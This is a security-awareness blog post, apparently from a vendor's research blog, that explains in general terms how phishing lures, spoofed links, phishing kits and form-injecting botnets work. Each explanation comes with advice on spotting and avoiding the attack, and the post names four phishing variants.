Phishing 101

There are many dangerous threats lurking in cyberspace today, from software vulnerabilities and exploits, to viruses and botnets. Among these threats are phishing attacks, an electronic communication scam that attempts to secure highly personal information such as credit card info, user names and passwords by assuming the identity of a trustworthy entity. The trustworthy entity can be anything from a friend, who’s email account has been compromised, to large legit corporations such as banks and online retailers such as Amazon and eBay.  A typically Phisher’s tackle box usually consists of bait, a hook and sometimes a phishing kit.

Laying the Bait To lure victims into disclosing sensitive information, Phishers exploit the human mind through the art of social engineering. They do this by baiting individuals using electronic messages that contain popular and/or relevant material. The bait may be laid through emails, social networking and instant or mobile text messages. For example, a phisher may spoof an email from the victim’s bank claiming their account needs to be updated. These emails can look VERY realistic and official, up to and including the bank’s logo and a URL that looks like it’s pointing to a legitimate URL. Or, the phish could come from a social networking site where the body of the message asks the victim to view updated photos or a “funny video” after logging in with their username and password.  Online gaming accounts are also frequently targeted through gaming forum invite messages.

Identifying the Bait: Most phishing messages arrive unsolicited. Always be aware of such messages, especially if an action or response is required on your part – no matter how urgent it seems to be. Whenever possible, attempt to identify the sender. If the source of a questionable message is coming from someone you know, send a message back asking a specific question. For any confidential material that is e-mail bound, PGP encryption & digital signing is recommended to confirm the identity of both parties.

The Hook After supplying the bait, the attacker needs to hook information from the victim. In the simplest way, this is done purely through email – asking the user to respond to the email with the requested information, or call a given number. The latter case is known as “Vishing” (see below for a definition). Scams such as advance fee fraud (aka the 419 Nigerian scam) follow this response methodology. Usually, the hook is provided in the form of a link (URL). Links are commonly spoofed. Their text will seem to link to the proper site (http://www.validbank.com) but in reality the link goes to a completely different site. Typosquatting is also popular: attackers will slightly change the link to seem legitimate on first glance (ie: http://www.val1dbank.com).

Avoiding the Hook: Always pay attention to links (“think before you link”) before you click. Hover your mouse over links to see where they are really taking you, before clicking. Carefully observe the domain in the link. Remember, “validbank.com” is different than “validbank.com.accounts.com”. Never give out a credit card number on an unsolicited request. Always ensure SSL (HTTPS) secure transactions are enabled when making any transaction online (look for the lock icon in your browser). If the browser claims the certificate is not valid, hold off until you verify with security experts (you can contact FortiGuard Labs anytime through http://www.fortiguard.com). Finally, do a search to see if others have spotted any suspicious activity on the subject line/content of the message. Fortinet’s FortiGuard blog is a great place to start.

Phishing Kits Attackers may obtain kits to deploy on Web servers to make their phish seem legitimate. These kits often contain pre-supplied templates for popular banks and social networking sites. After a victim is hooked, they will be brought to the attacker’s controlled Website and presented with the proper template (i.e. HTML code and graphics that mirror www.validbank.com’s setup). Of course, when the victim enters their credentials – it is sent to the phisher’s Website, and collected by the phishing kit. Like most Crimeware (software tools used for criminal purposes), hundreds of phishing kits exist today. One of the most popular is the Rock Phish kit. There are advanced phishing components in botnets such as Zeus and SpyEye. These use a technique known as form injection. In this case, the user’s machine is already compromised (even if they log in to validbank’s real site, their credentials will be sent to the attacker regardless). However, the attacker will extract further information by injecting fields into a banking session while the victim is logging in. For example, they will supply an additional field to obtain a driver’s license number or mother’s maiden name. These credentials are then leveraged down the road, typically for identity fraud.

Detecting Kits: Common phishing kits can be detected by using antivirus and Web filtering applications. Generic antivirus detection can help detect a kit no matter what Web server it is deployed on. Web filtering can guard against phishing web servers, even if they are changing code / templates to avoid detection. Kits can redirect you to the original site after hooking your information, so it’s not good practice to assume that since you can log in successfully, nothing malicious has occurred.

The Four Types of Phishing Scams

Phishing Blind Blind phishing is simply the act of casting the bait out into cyberspace, usually through mass spam emails, hoping someone will bite. These attacks usually go after common criteria like banking and social network credentials.

Spear-Phishing Spear-phishing involves a direct target. These are premeditated and much more effective thanks to a higher level of social engineering. These attacks usually go after specific criteria, such as database credentials.

Whaling Whaling is simply spear-phishing, but going after high profile targets, such as celebrities or C-Level executives.

Vishing Vishing is phishing over telephone systems. It is more common to vish on response (requiring the victim to call-back), rather than directly vish with an initial phone call.

No matter what type of phishing attack is used, the same security practices outlined above should apply; especially in the cases of spear-phishing, since they can be quite custom, making it more important to detect at the earlier stages (baiting / hooking).

Author bio: Derek Manky is FortiGuard Labs’ senior security strategist and contributes to security research and development, while also acting as a bridge to the public forum on results and findings. He coordinates research team efforts and manages responsible disclosure efforts between Fortinet and other vendors.

http://blog.fortinet.com/phishing-101/

Questions or Comments?